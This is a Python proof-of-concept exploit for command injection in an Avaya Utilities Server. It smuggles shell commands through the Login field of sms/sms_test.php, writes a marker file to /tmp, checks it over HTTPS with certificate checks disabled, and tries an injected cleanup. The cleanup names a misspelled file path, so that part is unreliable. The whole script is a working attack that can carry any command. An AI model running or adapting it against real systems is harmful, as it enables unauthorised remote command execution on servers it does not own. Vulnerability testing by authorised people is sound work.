#!/usr/bin/python

import requests
import sys
import base64
import time

from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

if len(sys.argv) != 2:
    print("Usage: {0} <avaya ip address>".format(sys.argv[0]))
    exit(-1)

# vulnerable page is sometimes available on both HTTP and HTTPS, but the /tmp directory is only served over HTTPS
base_url = "https://" + sys.argv[1] + ("/" if not sys.argv[1].endswith("/") else "")
vulnerable_url = base_url + "sms/sms_test.php"
result_url = base_url + "tmp/vulntest.txt"

headers = {
    "User-Agent": "AvayaUtilitiesServerPOCTestScript"
}

inject_template = "avaya@127.0.0.1:22&{0}|"

data = {
    "Password": "avaya",
    "SMSHost": "https://127.0.0.1",
    "SOAP_Timeout": "5",
    "Model": "AARAnalysis",
    "Op": "list",
    "Objectname": "",
    "Qualifier": "",
    "Fields": "*",
    "RecordRequest": "0",
    "RecordResultData": "0",
    "saw_form_id": "sms_test",
    "saw_form_next": "submit",
    "submitRequest": "Submit Request",
    "SessionID": "",
}

data["Login"] = inject_template.format("echo SUCCESS >/tmp/vulntest.txt")

print("Attempting command injection...")

try:
    r = requests.post(
        vulnerable_url, headers=headers, data=data, verify=False, timeout=5
    )
except requests.exceptions.ReadTimeout:
    pass

try:
    r = requests.post(result_url, headers=headers, verify=False, timeout=5)
    
    if r.status_code == 200 and "SUCCESS" in r.text:
        print("  [+] Exploit was successful.  System appears vulnerable.")
        print("\nAttempting Cleanup...")
        
        data["Login"] = inject_template.format("rm -f /tmp/vultest.txt")
        
        try:
            r = requests.post(
                vulnerable_url, headers=headers, data=data, verify=False, timeout=5
            )
        except requests.exceptions.ReadTimeout:
            pass
        
    else:
        print("  [-] Exploit appeared to be unsuccessful.  You should validate manually to confirm.")
        
except:
    print("  [!] An unknown error occurred, please try again, or manually verify.")
   